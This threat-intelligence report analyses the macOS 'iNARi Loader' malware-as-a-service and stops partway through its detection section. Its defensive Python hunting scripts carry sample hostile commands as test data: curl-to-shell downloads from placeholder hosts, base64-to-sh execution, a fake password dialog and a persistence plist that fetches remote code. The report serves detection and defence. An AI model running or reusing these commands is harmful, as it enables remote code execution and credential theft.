Introduction
A new malicious macOS loader and stealer dubbed “iNARi Loader” has emerged on cybercriminal forums in mid-April 2025 (macOS Users Beware! Hackers Allegedly Offering Full System Control Malware for Rent – Cyber Security News). First advertised on April 14, 2025 by a threat actor using the handle “patrick_star_dust” on the RAMP underground forum, iNARi is marketed as a “private” malware-as-a-service (MaaS) offering for macOS systems. It commands a high price and boasts an extensive feature set that represents a significant evolution in Mac malware capabilities (macOS Users Beware! Hackers Allegedly Offering Full System Control Malware for Rent – Cyber Security News). According to forum ads observed on the dark web, iNARi Loader combines remote desktop control with advanced data-stealing functionality, all while maintaining stealth and persistence on infected Macs (macOS Users Beware! Hackers Allegedly Offering Full System Control Malware for Rent – Cyber Security News). The following report provides a detailed analysis of iNARi’s technical features, potential targets, actor attribution, links to other malware, and guidance on indicators and detection.
1. Technical Breakdown of iNARi Loader Features
iNARi Loader is an advanced macOS malware with a modular architecture and multiple capabilities. Key features and capabilities include:
- System Persistence: The malware is designed for persistent installation on macOS, ensuring it remains active even after reboots. While specific persistence mechanisms were not detailed in the forum post, macOS malware typically achieves persistence via Launch Agents/Daemons or login items. By establishing persistence, iNARi can maintain long-term access to an infected system for the attacker.
- “Passwordless” Execution (Bypassing Prompts): One of iNARi’s most alarming capabilities is its ability to bypass macOS password prompts (macOS Users Beware! Hackers Allegedly Offering Full System Control Malware for Rent – Cyber Security News). In practice, this means the malware can perform privileged actions without requiring the user to enter their administrator password, thereby enabling “passwordless” execution of malicious payloads. This likely involves tricking the user into unknowingly authorizing the malware or exploiting a mechanism to avoid the prompt. Notably, this technique resembles methods used by previous macOS infostealers like Atomic Stealer, which employed fake system dialog boxes to capture user credentials (macOS Users Beware! Hackers Allegedly Offering Full System Control Malware for Rent – Cyber Security News). By bypassing or capturing the password prompt, iNARi can gain unrestricted access to sensitive data and system settings, effectively elevating privileges on the host.
- Modular Architecture: iNARi is built as a modular platform, allowing attackers to deploy a range of malicious components or plugins as needed (macOS Users Beware! Hackers Allegedly Offering Full System Control Malware for Rent – Cyber Security News). According to the advertisement, the loader supports loading different payload modules dynamically. Confirmed modules include:
  - VNC Remote Desktop Control: iNARi can install a module providing Virtual Network Computing (VNC) access, granting the attacker remote desktop control over the Mac (macOS Users Beware! Hackers Allegedly Offering Full System Control Malware for Rent – Cyber Security News). This essentially functions as a RAT (Remote Access Tool), enabling the threat actor to view the victim’s screen and interact with the system in real time. Such remote desktop capability on macOS is unprecedented at this level in commodity malware and gives attackers hands-on control for further exploitation.
  - Information-Stealer Modules: The malware can deploy advanced data-stealing modules targeting a variety of sensitive information (Hakerzy wystawili na sprzedaż malware dla systemu MacOS. Ceny wahają się od 5 do 10 tys. USD za miesiąc – Kapitan Hack). These infostealer components can harvest credentials (e.g. keychain passwords), browser data (cookies, saved logins), cryptocurrency wallet keys, documents, and other personal files (Hakerzy wystawili na sprzedaż malware dla systemu MacOS. Ceny wahają się od 5 do 10 tys. USD za miesiąc – Kapitan Hack). In essence, iNARi can act as a full-featured infostealer, similar to known families like Atomic or MetaStealer, by extracting confidential user data and exfiltrating it to the attacker.
  - Additional Plugins: Its modular design means new capabilities can be added over time. The threat actor advertises that premium subscribers get early access to new modules, implying ongoing development of plugins (potentially for tasks like keylogging, webcam access, etc.).
- Stealth & Evasion: iNARi Loader is built with stealth in mind, such that it can evade detection by security software without needing external obfuscation (cryptors). The seller claims it does not require use of crypting services to avoid antivirus detection, suggesting sophisticated built-in evasion techniques (macOS Users Beware! Hackers Allegedly Offering Full System Control Malware for Rent – Cyber Security News). This might include packing or runtime obfuscation, using legitimate-looking components, or fileless execution to stay undetected. By avoiding common malware signatures, iNARi can slip past macOS’s built-in protections and third-party AV solutions. (Notably, Apple’s native defenses like Gatekeeper, Notarization, and XProtect exist to block unsigned or known-malicious apps (Hakerzy wystawili na sprzedaż malware dla systemu MacOS. Ceny wahają się od 5 do 10 tys. USD za miesiąc – Kapitan Hack). iNARi’s distribution methods appear tailored to bypass these controls, as described below.)
- Multiple Delivery Vectors: The malware can be delivered and executed on target Macs through multiple methods, increasing the success rate of infection (macOS Users Beware! Hackers Allegedly Offering Full System Control Malware for Rent – Cyber Security News). Advertised delivery vectors include:
  - Malicious Terminal Commands: Attackers can deliver iNARi via one-line Terminal commands or scripts. For example, a user might be tricked into running a `curl | bash` command or similar, which fetches and executes the loader directly. This “off-file” script-based approach (fileless installation) can bypass Gatekeeper since no app is launched – the code executes in memory via the Terminal/shell.
  - Trojanized Disk Images (.dmg): iNARi may be packaged inside a `.dmg` installer file. Users downloading pirated software or email attachments could run a DMG that installs iNARi in the background. Disk images are a common format for Mac software distribution, so a trojanized DMG can appear legitimate.
  - Malicious Package Installers (.pkg): Similarly, iNARi can be delivered as a `.pkg` installer (the macOS package format). A `.pkg` file might be presented as an application update or utility; if run, it could install the malware components onto the system.
  - Fake or Bundled Applications: The threat actor also mentions malicious applications as a vector (Hakerzy wystawili na sprzedaż malware dla systemu MacOS. Ceny wahają się od 5 do 10 tys. USD za miesiąc – Kapitan Hack). This implies iNARi might be hidden inside a fake app (for example, a repackaged legitimate app or a game/crack) that the user is persuaded to open. Once launched, the app would surreptitiously deploy the loader.
  - “Off-File” Scripts: The mention of off-file scripts suggests iNARi can execute through script-based mechanisms that do not leave an obvious file on disk. This might involve using macOS scripting tools (like `osascript`/AppleScript, Python, or command-line) to load the payload directly into memory. Fileless techniques further complicate detection, as traditional file-scanning may not catch the malware.
- Full System Access & Control: Once executed, iNARi Loader effectively gives attackers full control over the infected Mac. The combination of password prompt bypass and VNC remote desktop means the adversary can do almost anything a legitimate user could do on the system – and do so stealthily. For instance, they could silently install additional software, exfiltrate files, or even use the victim’s machine as a pivot point into connected networks. Researchers have noted this blending of data theft and remote control is a worrisome escalation for macOS threats (macOS Users Beware! Hackers Allegedly Offering Full System Control Malware for Rent – Cyber Security News) (macOS Users Beware! Hackers Allegedly Offering Full System Control Malware for Rent – Cyber Security News). In essence, iNARi functions both as an infostealer and a RAT, allowing for persistent espionage or follow-on attacks after the initial infection.
Overall, iNARi’s technical feature set surpasses that of previous macOS malware seen in the wild (macOS Users Beware! Hackers Allegedly Offering Full System Control Malware for Rent – Cyber Security News). It represents a merger of capabilities (loader + stealer + remote access) in one platform, which until now have typically been found in separate malware. Security experts have flagged iNARi Loader as an advanced, high-threat tool due to these features, on par with the growing class of macOS-specific malware-as-a-service offerings (macOS Users Beware! Hackers Allegedly Offering Full System Control Malware for Rent – Cyber Security News) (macOS Users Beware! Hackers Allegedly Offering Full System Control Malware for Rent – Cyber Security News).
2. Known/Suspected Victims and Targeting
As of this report, no specific victims of iNARi have been publicly identified. The malware was only recently advertised for sale (as of April 2025) and has not been openly reported in any incident, suggesting it is either newly deployed or still in limited/private use (macOS Users Beware! Hackers Allegedly Offering Full System Control Malware for Rent – Cyber Security News). However, we can infer likely targeting and victims based on iNARi’s nature and the threat landscape:
- Victim Profile: Because iNARi is being sold as a high-priced MaaS, its clientele will likely be well-funded cybercriminals who in turn target high-value victims. The monthly subscription cost for iNARi is extremely steep – $5,000 USD/month for standard, and $10,000 USD/month for premium access (macOS Users Beware! Hackers Allegedly Offering Full System Control Malware for Rent – Cyber Security News) – far above the prices of earlier Mac stealers like Atomic (which was ~$1k/month) (macOS Users Beware! Hackers Allegedly Offering Full System Control Malware for Rent – Cyber Security News). These prices indicate that the actors who purchase iNARi will seek significant returns on their investment. Likely targets include:
  - Financially Lucrative Individuals: Cryptocurrency holders, investors, or wealthy executives using Macs could be prime targets. MacOS is popular among tech entrepreneurs, finance professionals, and high-net-worth individuals – groups that present attractive financial targets for theft of crypto wallets, banking logins, or sensitive data.
  - Corporate Environments (Mac Users): Many businesses (especially in creative industries, technology, media, and marketing) deploy MacBooks for their staff. Threat actors might use iNARi to infiltrate such companies, either to steal proprietary information or to gain a foothold for further network compromise. The remote desktop feature would be particularly useful for an attacker attempting to manually explore a corporate victim’s machine or move laterally in a network.
  - Developers and Administrators: Technical users on macOS (developers, system admins) may have valuable credentials or access. Past Mac malware campaigns (e.g. targeting software developers) indicate interest in these users. iNARi could be employed in supply-chain attacks by first infecting a developer’s Mac, then trojanizing the apps they distribute.
- Industries and Regions: There is no indication that iNARi is limited to a particular region – since it’s sold on a forum accessible to global criminals, it could be used against victims worldwide. However, given it originates from a likely Russian/English cybercrime forum, it is probable that Western countries (U.S., Europe) will be the main targets (many Russian-based threat actors avoid targeting CIS countries). Industries at risk include those with higher Mac usage: technology firms, design and media companies, universities (where students/faculty use Macs), and any enterprise with an executive who favors Mac. Essentially, any organization with macOS assets should consider itself a potential target, especially if they hold valuable data or funds.
- Delivery Tactics: To actually reach these victims, attackers using iNARi would likely rely on social engineering and drive-by downloads. Because macOS has strong default security around app execution, the initial intrusion might involve tricking the user. Possible attack scenarios include:
  - Phishing Emails carrying a malicious DMG/PKG attachment or a link to one (disguised as a software update, document, or utility). The email lure could be tailored to Mac users (e.g. a fake Apple security update notification).
  - Malvertising and Fake Software Sites: We’ve seen macOS malware like Atomic spread via fake software websites and ads (for VPNs, media players, cracks, etc.). Similarly, iNARi could be dropped through rogue ads or search results luring users to download a trojanized app installer. Once the user runs the installer, iNARi would silently install in the background (macOS Users Beware! Hackers Allegedly Offering Full System Control Malware for Rent – Cyber Security News).
  - Forum or Torrent Distribution: Since many Mac users seek pirated software or uncommon apps on forums and torrents, an attacker might bundle iNARi with such downloads (for instance, a pirated Adobe software DMG that also installs the malware).
  - Terminal Social Engineering: Advanced attackers might convince targets to execute a Terminal command (for example, under the guise of tech support or a “configuration script”). Non-technical users can be fooled into running copy-pasted commands, which could directly fetch and execute iNARi in memory.
At this stage, iNARi appears to be in the hands of threat actors but not yet reported in any major breach or campaign. Security researchers and law enforcement are likely on the lookout for any incident involving macOS compromises with remote desktop access, which would be a hallmark of iNARi’s usage. Organizations in the aforementioned categories should proactively harden their Mac endpoints and educate users, anticipating that iNARi or similar malware may soon be deployed in the wild. The mere existence of iNARi Loader underscores that macOS users are now firmly in the crosshairs of sophisticated cybercriminal operations (macOS Users Beware! Hackers Allegedly Offering Full System Control Malware for Rent – Cyber Security News).
3. Threat Actor ‘patrick_star_dust’ – Attribution and Background
The individual or group behind iNARi Loader uses the alias “patrick_star_dust” on the RAMP cybercrime forum (Ramp4u). This moniker appears to be a whimsical reference (combining the cartoon character Patrick Star with “stardust”) and does not directly reveal identity. Little is publicly known about this threat actor’s background, as this handle has not been prominently mentioned in prior threat reports before the iNARi advertisement. Key points on attribution and actor profile:
- Forum Activity: patrick_star_dust is the forum user who created the thread offering iNARi Loader for sale. RAMP (Ramp4u) is a known underground forum where threat actors trade malware, exploits, stolen data, and access. It has a significant user base of Russian-speaking cybercriminals and ransomware affiliates. The presence of iNARi’s advertisement on RAMP suggests that the seller trusts this venue to reach serious buyers. It also implies the actor is somewhat established or at least vetted on that forum (since high-priced malware offerings often require reputation or forum escrow). It’s possible “patrick_star_dust” has been involved in previous dealings on RAMP or other forums under the same or different aliases, but no clear link has been made publicly.
- Past Campaigns or Malware: As of now, there is no confirmed association between patrick_star_dust and earlier known Mac malware strains. iNARi appears to be introduced as a “private” tool not previously seen, rather than a rebrand of an existing malware (e.g., it is not simply Atomic Stealer being resold, but a distinct product). If patrick_star_dust had a history, it might be in developing or selling other malware or services. Some speculation can be made: the actor’s ability to develop a complex Mac malware suggests expertise in macOS internals and development (possibly a background in Mac software or a team with such skills). They may have tracked the success of earlier Mac stealers (like Atomic, Meta, Realst) and decided to enter this market with a more advanced offering. It is also possible that patrick_star_dust is connected to or funded by an existing cybercrime group that saw a need for a bespoke Mac tool. However, until more intelligence is gathered or if arrests/indictments occur, their true identity and affiliations remain unknown.
- Motivation and Targeting: The actor is clearly financially motivated, given the MaaS rental model. By setting very high rental prices ($5k-$10k monthly), patrick_star_dust positions iNARi as an exclusive tool for top-tier criminals. This suggests confidence in the malware’s value. It also implies the actor is not targeting end victims directly (they are selling to other attackers), which is typical of malware developers. The patrick_star_dust actor likely profits from these subscriptions and possibly offers support or updates as part of the premium package (macOS Users Beware! Hackers Allegedly Offering Full System Control Malware for Rent – Cyber Security News). There is no evidence linking this actor to nation-state APT activity; the behavior (selling malware broadly on a forum) is more aligned with the cybercrime-as-a-business model.
- Related Aliases: No alternate handles for patrick_star_dust are publicly documented yet. Sometimes, threat actors use different nicknames on different forums or switch names to avoid tracking. Researchers will be watching if the coding style or infrastructure of iNARi overlaps with any known malware author. For instance, if any code is shared with past Mac malware, that could hint at a known author. At present, iNARi seems to be a fresh creation, so patrick_star_dust could be a relatively new player in the malware dev scene, or a veteran operating under a new alias specifically for this product launch.
- Reputation: Early chatter in the infosec community (for example, on social media) shows researchers taking iNARi seriously due to its features, but also a degree of caution – since until samples are obtained, claims in advertisements are taken with a grain of salt. If patrick_star_dust delivers on promises (i.e., iNARi works as advertised), their reputation among cybercriminal buyers will rise. RAMP forum feedback or vouches (if any) were not visible in open sources. If this actor successfully sells iNARi, we may see them continue to update the malware or even expand offerings (perhaps versions for Windows or mobile, although nothing like that is indicated yet).
In summary, ‘patrick_star_dust’ appears to be the developer or vendor of iNARi Loader, operating out of an underground forum to conduct sales. There is not enough data to tie this persona to known groups or past campaigns at this time. The situation is reminiscent of the introduction of the Atomic macOS stealer in early 2023, which was also sold by a new alias and later gained traction. It will be important to monitor this actor’s activities on dark web forums and any intelligence from law enforcement in order to learn more about their identity, partnerships, or potential customer base.
4. Connections to Other Malware and Broader Operations
The emergence of iNARi Loader is part of a broader trend of increasing macOS threats and appears to share some traits with other malware, though it also introduces new capabilities. Below are the notable connections and comparisons:
- Evolution of macOS Infostealers: Over the last two years, macOS has seen a spike in infostealer malware-as-a-service. Notable examples include Atomic Stealer (AMOS), MetaStealer, PureLand, Realst (Real-Stealer), Cthulhu Stealer, Banshee, and others (macOS Users Beware! Hackers Allegedly Offering Full System Control Malware for Rent – Cyber Security News). These primarily focus on stealing data like passwords, cookies, crypto keys, etc. iNARi clearly belongs to this same category of threats but attempts to surpass earlier strains with a more comprehensive feature set (macOS Users Beware! Hackers Allegedly Offering Full System Control Malware for Rent – Cyber Security News). For instance, while Atomic Stealer could pilfer data and prompt for credentials, it did not have built-in remote desktop control. iNARi’s introduction signals that threat actors are iterating on each other’s designs – combining infostealers with RAT capabilities. We can see iNARi as an infostealer 2.0, building on the successes and techniques of its predecessors.
- Technique Parallels (Atomic Stealer): One concrete connection is the method of bypassing or abusing password prompts. The iNARi seller explicitly notes the malware can bypass macOS authentication dialogs (macOS Users Beware! Hackers Allegedly Offering Full System Control Malware for Rent – Cyber Security News), and likens it to prior malware like Atomic Stealer. Atomic, which emerged in 2023, famously presented fake system password prompts to users (e.g., a phony “System Preferences” dialog) to steal their password and then used it to unlock keychain or execute privileged actions (macOS Users Beware! Hackers Allegedly Offering Full System Control Malware for Rent – Cyber Security News). iNARi likely employs a similar social-engineering trick or possibly an automation of approving security prompts. This is a clear case of a new malware building on known tactics from an older strain. The connection doesn’t necessarily mean the same authors – it could simply be tactic reuse. It does indicate that knowledge of Atomic Stealer’s approach influenced iNARi’s development.
- Overlap with RATs and hVNC: By offering VNC-based remote desktop control, iNARi overlaps with the functionality of Remote Access Trojans. On Windows, malware like RevengeRAT, NetWire, and the concept of hVNC (hidden VNC) in banking trojans have provided similar remote control for years. On macOS, such capability has been rarer. One somewhat related malware was HZ macOS RAT (not widely known publicly, but referenced in some reports) which allowed full remote command execution (Hakerzy wystawili na sprzedaż malware dla systemu MacOS. Ceny wahają się od 5 do 10 tys. USD za miesiąc – Kapitan Hack). iNARi’s remote module could be seen as filling a similar niche for Mac: it potentially provides hidden remote access where the attacker can control the GUI without the user’s knowledge. This means iNARi might be used in scenarios beyond just stealing data – for example, an attacker could use the remote access to manually conduct fraud (if the victim is logged into banking), to install ransomware, or to propagate further into the environment (as seen when Windows RATs are used to deploy ransomware in networks). Thus, iNARi could be a tool in broader attack operations, such as a multi-stage breach where initial access is via iNARi, followed by hands-on-keyboard activity via its VNC, potentially leading to a larger compromise of an organization.
- Potential Links to APT or Nation-State Tools: At this time, iNARi is being peddled in the criminal underground, so it’s primarily considered a crimeware tool. However, sophisticated nation-state actors (APTs) that target macOS might take interest in its capabilities. For instance, North Korea-linked groups have developed or used macOS malware (e.g., the RustBucket backdoor and KoiMiner/KoiStealer reported in 2023 (RustDoor and Koi Stealer for macOS Used by North Korea-Linked …) (Stealers on the Rise: A Closer Look at a Growing macOS Threat)). Those tools were custom to the APT’s campaigns. It’s unlikely an APT would purchase a tool like iNARi publicly, but they could certainly be inspired by it or might obtain it through covert means. One could draw a parallel: if an APT or spy agency wanted access to Mac targets, a capability like iNARi’s password bypass and remote desktop would be extremely useful. That said, no direct connection to any APT group has been observed. The more likely scenario is that financially motivated groups (e.g., those behind ransomware or large-scale fraud) use iNARi. For example, a ransomware affiliate crew that normally targets Windows networks might use iNARi to target an executive’s MacBook as an entry point to a company’s infrastructure.
- Infection Campaigns & Affiliates: If iNARi gains popularity, it could become part of affiliate programs or bundled into malware kits. The way Atomic Stealer was used by multiple actors in separate phishing campaigns (disguised as different apps) may repeat with iNARi. We might see multiple distinct campaigns leveraging iNARi, not necessarily coordinated with each other, since any buyer can deploy it as they wish. Thus, iNARi isn’t an “operation” by itself; it’s a tool that can plug into various operations. It could appear in different guises – one campaign might deliver it as a fake crypto wallet app, another as a poisoned software update – all using the same core malware sold by patrick_star_dust. This complicates attribution of incidents, because even if two intrusions use iNARi, they might be carried out by different groups who simply bought the same tool.
- Comparison with Other Recent Mac Malware: In the context of other recent threats:
  - Banshee Stealer (not widely documented publicly, but referenced) was another macOS stealer in 2024 with less capability, mainly focused on credential theft. It lacked the remote access that iNARi has.
  - MetaStealer/Python-based stealers often were simpler and spread via mass spam. iNARi, by contrast, appears more targeted due to its price and complexity.
  - Some macOS malware have been adaptations of Windows malware (for instance, the MetaStealer had some ties to RedLine code ported to Mac). iNARi so far does not show it’s a port of a Windows malware; it seems to be an original development for macOS.
In summary, iNARi Loader sits at the intersection of infostealer and RAT capabilities for macOS, marking a step-up in the criminal toolkit. It draws on techniques seen in prior Mac malware (like Atomic Stealer’s credential phishing (macOS Users Beware! Hackers Allegedly Offering Full System Control Malware for Rent – Cyber Security News)) and extends them. Its presence for sale on forums fits into the broader cybercrime ecosystem, where MaaS offerings for Windows have long existed – now macOS is getting similar attention. Organizations should note that Mac endpoints can no longer be considered niche or safe by obscurity; tools like iNARi enable adversaries to include Macs in their attack campaigns with comparable ease and thoroughness as Windows machines. The trend is clear: macOS malware is on the rise, both in quantity and sophistication (macOS Users Beware! Hackers Allegedly Offering Full System Control Malware for Rent – Cyber Security News), and iNARi is a prime example of this evolution.
5. Indicators of Compromise, Detection, and Hunting Guidance
Detecting iNARi Loader can be challenging due to its stealth features, but defenders can look for both behavioral indicators and artifacts on systems. As of now, concrete IOCs (like hashes or C2 domains/IPs) for iNARi have not been publicly released, since samples have not been widely obtained. Organizations should monitor threat intelligence feeds for any emerging IOCs associated with iNARi. In the meantime, consider the following detection strategies and hunting tips:
- Unusual Process Behavior: iNARi’s activities may manifest in system logs or EDR telemetry as abnormal process behavior. Key things to watch:
  - Terminal/Script Execution: If the infection is initiated via a Terminal command, you may see processes like `bash`, `zsh`, or `curl` spawning unexpectedly under a user context. For example, a user’s bash process executing a base64 blob or reaching out to the internet (to fetch a payload) is suspicious. Hunt for command-line histories or log entries that show one-liner commands fetching from URLs or performing obfuscated tasks.
  - New or Unknown Applications Launching: If delivered via a DMG/PKG, the user might launch what they think is a legitimate installer. This would appear as an unfamiliar process name. Pay attention to any unrecognized installer or app executions, especially if they prompt for accessibility or privacy permissions (as malware might try to get Accessibility access to control the system).
  - Privilege Escalation Attempts: Since iNARi can bypass password prompts, any process that would normally trigger an authorization dialog doing so without user input could leave traces. Look for log entries around `SecurityAgent` or `authd` where a password prompt event occurred but maybe was programmatically satisfied. Also, a malicious process might call AppleScript or other APIs to simulate clicks. Monitoring for processes using AppleScript (`osascript`) unexpectedly can be a clue.
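The delivery vectors in Section 1 and the process-behavior indicators above reduce to the same command-line patterns, so one triage routine covers both. The following is an added example, not code from the report or any vendor tool: it scores constructed process events for a downloader piped into a shell, a base64 blob decoded into an interpreter, and `osascript` launched from a non-interactive parent; the event fields and the interactive-parent allow-list are assumptions to be tuned per environment.

```python
"""Triage macOS process-execution events (as an EDR or `log show` would supply
them) for: a downloader piped into a shell, a base64 blob decoded into an
interpreter, and osascript launched from a non-interactive parent.
All events below are constructed samples, not real iNARi telemetry."""
import shlex

DOWNLOADERS = {"curl", "wget"}
SHELLS = {"sh", "bash", "zsh", "dash"}
INTERPRETERS = SHELLS | {"python", "python3", "perl", "osascript"}
WRAPPERS = {"sudo", "env", "nohup", "caffeinate"}   # looked through, not matched
B64_DECODE_FLAGS = {"-d", "-D", "--decode"}
# Assumed baseline: parents from which osascript is ordinary interactive use.
INTERACTIVE_PARENTS = {"Terminal", "iTerm2", "Script Editor", "Automator"}

def _base(path):
    return path.rsplit("/", 1)[-1]

def _tokens(cmdline):
    """Shell-aware tokenisation: quotes are honoured and '|', ';', '&&'
    become separate tokens even when written without surrounding spaces."""
    lexer = shlex.shlex(cmdline, posix=True, punctuation_chars=True)
    lexer.whitespace_split = True
    lexer.commenters = ""          # a '#' inside a URL is not a comment
    try:
        return list(lexer)
    except ValueError:             # unbalanced quotes: crude fallback
        return cmdline.replace("|", " | ").split()

def _commands(tokens):
    """Split tokens into commands (on ; && || &) and each command into
    pipeline stages (on |).  Returns a list of commands, each a list of stages."""
    commands, cmd, stage = [], [], []
    for tok in tokens + [";"]:
        if tok == "|":
            cmd.append(stage)
            stage = []
        elif tok in (";", "&&", "||", "&"):
            cmd.append(stage)
            commands.append([s for s in cmd if s])
            cmd, stage = [], []
        else:
            stage.append(tok)
    return [c for c in commands if c]

def _program(stage):
    """Program name of a pipeline stage, skipping sudo/env-style wrappers and
    their flags so that `sudo -S bash` resolves to bash."""
    i = 0
    while i < len(stage) and (_base(stage[i]) in WRAPPERS
                              or (i > 0 and stage[i].startswith("-"))):
        i += 1
    return _base(stage[i]) if i < len(stage) else ""

def triage_cmdline(cmdline):
    """Return the set of rule names one command line matches, recursing into
    `sh -c '...'` payloads so that wrapped one-liners are not missed."""
    hits = set()
    for command in _commands(_tokens(cmdline)):
        programs = [_program(s) for s in command]
        for left, right in zip(programs, programs[1:]):
            if left in DOWNLOADERS and right in SHELLS:
                hits.add("pipe_to_shell")              # curl ... | bash
        for i, (prog, stage) in enumerate(zip(programs, command)):
            if (prog == "base64" and B64_DECODE_FLAGS & set(stage)
                    and any(p in INTERPRETERS for p in programs[i + 1:])):
                hits.add("base64_to_interpreter")      # echo .. | base64 -D | sh
            if prog in SHELLS and "-c" in stage and stage.index("-c") + 1 < len(stage):
                hits |= triage_cmdline(stage[stage.index("-c") + 1])
    return hits

def triage_event(event):
    """Sorted rule hits for one process event, adding the parent-based
    osascript rule that needs more than the command line."""
    hits = triage_cmdline(event["cmdline"])
    if _base(event["image"]) == "osascript" and event["parent"] not in INTERACTIVE_PARENTS:
        hits.add("osascript_noninteractive_parent")
        # An input dialog raised from a non-interactive parent is the fake
        # credential-prompt pattern the report compares to Atomic Stealer.
        if "display dialog" in event["cmdline"]:
            hits.add("osascript_dialog_prompt")
    return sorted(hits)

SAMPLE_EVENTS = [  # constructed telemetry, not real iNARi data
    {"pid": 401, "parent": "Terminal", "image": "/bin/zsh",
     "cmdline": "zsh -c 'curl -fsSL http://update.example.test/run.sh|bash'"},
    {"pid": 402, "parent": "Installer", "image": "/bin/sh",
     "cmdline": "sh -c 'echo aGVsbG8= | base64 -D | sh'"},
    {"pid": 403, "parent": "Installer", "image": "/usr/bin/osascript",
     "cmdline": 'osascript -e \'display dialog "Update needs your password" default answer ""\''},
    {"pid": 404, "parent": "Terminal", "image": "/usr/bin/curl",
     "cmdline": "curl -o report.pdf https://files.example.test/report.pdf"},
    {"pid": 405, "parent": "Script Editor", "image": "/usr/bin/osascript",
     "cmdline": "osascript ~/Desktop/rename-files.scpt"},
]

if __name__ == "__main__":
    for event in SAMPLE_EVENTS:
        print(event["pid"], ", ".join(triage_event(event)) or "-")
```

Events 401 to 403 each trip one rule family while 404 and 405 (a plain download and an interactive osascript run) stay clean, which is the false-positive boundary the allow-list exists for.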
- Persistence Mechanisms: After initial run, iNARi would establish persistence. Common macOS persistence indicators include:
  - Launch Agents/Daemons: Check `~/Library/LaunchAgents`, `/Library/LaunchAgents`, and `/Library/LaunchDaemons` for any newly created `.plist` files that load unusual executables or scripts on startup. iNARi might install a LaunchAgent for the current user or a LaunchDaemon for system-wide persistence. The plist name might be innocuous or random. If you find a plist referencing an unfamiliar binary in an odd location (like inside `~/Library/Application Support` or `/tmp`), that’s suspect.
  - Login Items: In macOS (especially newer versions), malware might add itself as a login item. Use the system’s `tmutil` or `log show` to see if any login item additions occurred around the time of compromise.
  - Persistence through Profiles or Cron: Less likely, but check if any new configuration profiles were installed (which could grant the malware special rights), or any cron jobs/LaunchAgent that periodically fetches code.
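As an added example (not from the report or any vendor tool), the following audits launchd property lists for the traits listed above: programs staged in /tmp-style or hidden directories, user-writable Application Support paths, interpreters handed inline code or a downloader, and Apple-style labels on jobs outside /System/Library. The sample plists are constructed in memory; `audit_directories()` reads the three real directories on a live Mac.

```python
"""Audit launchd plists from ~/Library/LaunchAgents, /Library/LaunchAgents and
/Library/LaunchDaemons for persistence traits worth a second look.
The SAMPLE_PLISTS are constructed examples, not real iNARi artifacts."""
import glob
import os
import plistlib

LAUNCHD_DIRS = ["~/Library/LaunchAgents", "/Library/LaunchAgents",
                "/Library/LaunchDaemons"]
# Locations a persistent job rarely has a legitimate reason to execute from.
STAGING_PREFIXES = ("/tmp/", "/private/tmp/", "/var/tmp/", "/private/var/tmp/",
                    "/Users/Shared/", "/var/folders/", "/private/var/folders/")
INTERPRETERS = {"sh", "bash", "zsh", "osascript", "python", "python3", "perl"}
DOWNLOADERS = {"curl", "wget"}
INLINE_FLAGS = {"-c", "-e"}

def _base(path):
    return path.rsplit("/", 1)[-1]

def audit_plist(data):
    """Return a list of finding strings for one launchd plist (XML or binary)."""
    try:
        plist = plistlib.loads(data)
    except Exception as exc:   # InvalidFileException, ExpatError, ...
        return [f"unparseable plist ({type(exc).__name__})"]
    if not isinstance(plist, dict):
        return ["plist root is not a dictionary"]
    args = [str(a) for a in plist.get("ProgramArguments") or []]
    program = str(plist.get("Program") or (args[0] if args else ""))
    label = str(plist.get("Label", ""))
    if not program:
        return ["no Program or ProgramArguments"]
    findings = []
    if label.startswith("com.apple."):
        # Apple's own jobs live under /System/Library; everything audited here
        # is third-party, so an Apple-style label is masquerading.
        findings.append(f"Apple-style label on third-party job: {label}")
    if program.startswith(STAGING_PREFIXES):
        findings.append(f"program in staging location: {program}")
    if any(p.startswith(".") for p in program.split("/") if p not in (".", "..")):
        findings.append(f"program under hidden directory: {program}")
    if program.startswith("/Users/") and "/Library/Application Support/" in program:
        findings.append(f"program in user-writable Application Support: {program}")
    if _base(program) in INTERPRETERS and INLINE_FLAGS & set(args[1:]):
        findings.append(f"interpreter runs inline code: {' '.join(args[:2])}")
    if any(_base(tok) in DOWNLOADERS for arg in args for tok in arg.split()):
        findings.append("job invokes a downloader (curl/wget) at launch")
    return findings

def audit_directories(dirs=LAUNCHD_DIRS):
    """Audit every .plist in the live directories; returns {path: findings}."""
    results = {}
    for d in dirs:
        for path in glob.glob(os.path.join(os.path.expanduser(d), "*.plist")):
            with open(path, "rb") as fh:
                findings = audit_plist(fh.read())
            if findings:
                results[path] = findings
    return results

def _xml(d):
    return plistlib.dumps(d)   # XML plist bytes, the on-disk form of a launchd job

SAMPLE_PLISTS = {  # constructed examples, not iNARi artifacts
    "~/Library/LaunchAgents/com.apple.helperagent.plist": _xml({
        "Label": "com.apple.helperagent",
        "ProgramArguments": ["/bin/zsh", "-c",
                             "curl -s http://updates.example.test/a | zsh"],
        "RunAtLoad": True, "KeepAlive": True}),
    "~/Library/LaunchAgents/com.example.sync.plist": _xml({
        "Label": "com.example.sync",
        "ProgramArguments": [
            "/Users/alice/Library/Application Support/.syncd/agentd"],
        "RunAtLoad": True}),
    "/Library/LaunchDaemons/com.vendor.updater.plist": _xml({
        "Label": "com.vendor.updater",
        "Program": "/Library/Application Support/Vendor/updater",
        "StartInterval": 3600}),
    "/Library/LaunchAgents/damaged.plist": b"<plist><dict>",   # truncated file
}

def audit_samples(samples=SAMPLE_PLISTS):
    """Audit in-memory plists; returns {path: findings} for those with findings."""
    return {p: f for p, f in ((p, audit_plist(d)) for p, d in samples.items()) if f}

if __name__ == "__main__":
    for path, findings in audit_samples().items():
        print(path)
        for finding in findings:
            print("   -", finding)
```

An unparseable plist is reported rather than skipped, since a deliberately malformed file is itself worth a look during a hunt.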
- Remote Access Indicators: The VNC-based remote desktop functionality may produce specific indicators:
- Networking: VNC typically uses TCP port 5900. Even if iNARi uses a custom implementation, it may still rely on opening a port or socket for the attacker to connect. Monitor for any process listening on unusual ports, or any outgoing/incoming connections that coincide with user not being active. If the malware piggybacks on Apple’s built-in Screen Sharing service, you might see the
screensharingd
process running when it shouldn’t, or System Preferences -> Sharing being enabled unexpectedly. - User Interface Artifacts: Hidden VNC might not show obvious signs to the local user, but there could be subtle clues: the mouse cursor moving on its own, or applications opening briefly. These are anecdotal, but if a user reports “ghost” interactions, take it seriously as it could indicate remote control.
- Logons at Odd Times: The attacker via VNC might create a hidden desktop session. Check system logs for user sessions or remote logins at strange times (especially if using VNC over SSH or similar, logs might show sessions opening).
- Data Exfiltration and C2: Eventually, stolen data must leave the victim machine. iNARi likely communicates with a command-and-control (C2) server to upload stolen data or receive instructions (especially for modules). Hunt for:
